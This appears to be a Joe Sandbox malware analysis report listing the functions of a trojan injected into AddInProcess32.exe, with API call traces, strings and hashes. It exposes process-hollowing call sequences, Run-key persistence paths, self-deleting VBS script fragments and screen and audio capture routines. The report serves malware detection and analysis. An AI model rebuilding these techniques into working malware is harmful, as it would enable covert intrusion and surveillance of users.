Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744

Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4

Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614

Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(-0006A42D,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9

EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E

Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754

Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
Opcode Fuzzy Hash: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6

Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
Instruction Fuzzy Hash:

Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
CreateCompatibleDC.GDI32(00000000), ref: 00416EA5

Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
DeleteDC.GDI32(00000000), ref: 00416F32
DeleteDC.GDI32(00000000), ref: 00416F35
DeleteObject.GDI32(00000000), ref: 00416F38
SelectObject.GDI32(00000000,00000000), ref: 00416F59
DeleteDC.GDI32(00000000), ref: 00416F6A
DeleteDC.GDI32(00000000), ref: 00416F6D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
GetIconInfo.USER32(?,?), ref: 00416FC5
DeleteObject.GDI32(?), ref: 00416FF4
DeleteObject.GDI32(?), ref: 00417001
DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
DeleteDC.GDI32(?), ref: 0041713C
DeleteDC.GDI32(00000000), ref: 0041713F
DeleteObject.GDI32(00000000), ref: 00417142
GlobalFree.KERNEL32(?), ref: 0041714D
DeleteObject.GDI32(00000000), ref: 00417201
GlobalFree.KERNEL32(?), ref: 00417208
DeleteDC.GDI32(?), ref: 00417218
DeleteDC.GDI32(00000000), ref: 00417223

Strings

DISPLAY, xrefs: 00416E91

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
Opcode Fuzzy Hash: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A

Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
GetProcAddress.KERNEL32(00000000), ref: 00416477
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
GetProcAddress.KERNEL32(00000000), ref: 0041648B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
GetProcAddress.KERNEL32(00000000), ref: 0041649F
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
GetProcAddress.KERNEL32(00000000), ref: 004164B3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
GetThreadContext.KERNEL32(?,00000000), ref: 00416583
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
SetThreadContext.KERNEL32(?,00000000), ref: 00416766
ResumeThread.KERNEL32(?), ref: 00416773
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
GetCurrentProcess.KERNEL32(?), ref: 00416795
TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
GetLastError.KERNEL32 ref: 004167B8

Strings

ZwCreateSection, xrefs: 0041645A
ZwClose, xrefs: 004164A1
ZwMapViewOfSection, xrefs: 00416479
ntdll, xrefs: 0041645F, 0041647E, 00416492, 004164A6
ZwUnmapViewOfSection, xrefs: 0041648D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
ExitProcess.KERNEL32 ref: 0040C389

Strings

H"G, xrefs: 0040C088
\update.vbs, xrefs: 0040C134
exepath, xrefs: 0040C0B0
fso.DeleteFile ", xrefs: 0040C1F3
On Error Resume Next, xrefs: 0040C172
"), xrefs: 0040C18E
fso.DeleteFolder ", xrefs: 0040C264
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C07B
Temp, xrefs: 0040C139
t<F, xrefs: 0040C2F0, 0040C331
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C2BA
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C32C
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C02A
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C163
while fso.FileExists(", xrefs: 0040C1A5
wend, xrefs: 0040C242
""", 0, xrefs: 0040C2A0
open, xrefs: 0040C377

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
API String ID: 1861856835-1953526029
Opcode ID: e658372aa2ace14a3aa0232e890420069580ff818bd4bb758409c283b9428d45
Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
Opcode Fuzzy Hash: e658372aa2ace14a3aa0232e890420069580ff818bd4bb758409c283b9428d45
Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E

Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
ExitProcess.KERNEL32(00000000), ref: 00410F05
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
CloseHandle.KERNEL32(00000000), ref: 00410FA0
GetCurrentProcessId.KERNEL32 ref: 00410FA6
PathFileExistsW.SHLWAPI(?), ref: 00410FD7
GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
lstrcatW.KERNEL32(?,.exe), ref: 00411066

Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
Sleep.KERNEL32(000001F4), ref: 004110E7
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
CloseHandle.KERNEL32(00000000), ref: 0041110E
GetCurrentProcessId.KERNEL32 ref: 00411114

Strings

(#G, xrefs: 00410EE8
H"G, xrefs: 00410F0B
.exe, xrefs: 0041105A
temp_, xrefs: 00411048
exepath, xrefs: 00410F31
WDH, xrefs: 00410FAD, 0041111B
open, xrefs: 004110A0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
API String ID: 2649220323-71629269
Opcode ID: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
Opcode Fuzzy Hash: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D

Function 0040B871 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 296fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040B882
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
_wcslen.LIBCMT ref: 0040B968
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000), ref: 0040B9E0
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
_wcslen.LIBCMT ref: 0040BA25
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
ExitProcess.KERNEL32 ref: 0040BC36

Strings

6, xrefs: 0040B95C
fso.DeleteFile , xrefs: 0040BAB6
\install.vbs, xrefs: 0040BA3E
WScript.Sleep 1000, xrefs: 0040BA6D
Temp, xrefs: 0040BA43
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 0040B916, 0040B91B, 0040B94B, 0040B9DA, 0040B9DF, 0040B9E6, 0040BAAA
!G, xrefs: 0040B8F8
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040BB57
!G, xrefs: 0040B8C6
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BBD2
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BA7B
""", 0, xrefs: 0040BB47
open, xrefs: 0040BC24

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
API String ID: 2743683619-2884405633
Opcode ID: bc7a761b7f8a7faaf126ce28aab3d5fb2a3d74aecff730b0b059b7d0313fb715
Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
Opcode Fuzzy Hash: bc7a761b7f8a7faaf126ce28aab3d5fb2a3d74aecff730b0b059b7d0313fb715
Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

Function 0040BC59 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 259registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
ExitProcess.KERNEL32 ref: 0040BFD7

Strings

exepath, xrefs: 0040BD3F
fso.DeleteFile ", xrefs: 0040BED3
On Error Resume Next, xrefs: 0040BE52
"), xrefs: 0040BE6F
fso.DeleteFolder ", xrefs: 0040BF48
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BCF6
Temp, xrefs: 0040BE04
H"G, xrefs: 0040BD1C
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BF7F
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BCA5
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BE43
.vbs, xrefs: 0040BDBF
while fso.FileExists(", xrefs: 0040BE86
wend, xrefs: 0040BF22
pth_unenc, xrefs: 0040BC60
open, xrefs: 0040BFCA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2974882535
Opcode ID: 306cdc7268d5e4f4d9ffd7b65128ba4b94d279ba2d7c1b6e57378c9487e9cf78
Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
Opcode Fuzzy Hash: 306cdc7268d5e4f4d9ffd7b65128ba4b94d279ba2d7c1b6e57378c9487e9cf78
Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E

Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
SetEvent.KERNEL32 ref: 004191CF
WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
CloseHandle.KERNEL32 ref: 004191F0
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C

Strings

close audio, xrefs: 00419217
stop audio, xrefs: 0041920D
status audio mode, xrefs: 004191AD
alias audio, xrefs: 0041906E
" type , xrefs: 0041908B
stopped, xrefs: 004191B8
pause audio, xrefs: 00419180
open ", xrefs: 00419086
resume audio, xrefs: 00419198
play audio, xrefs: 00419101

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
Opcode Fuzzy Hash: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E

Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
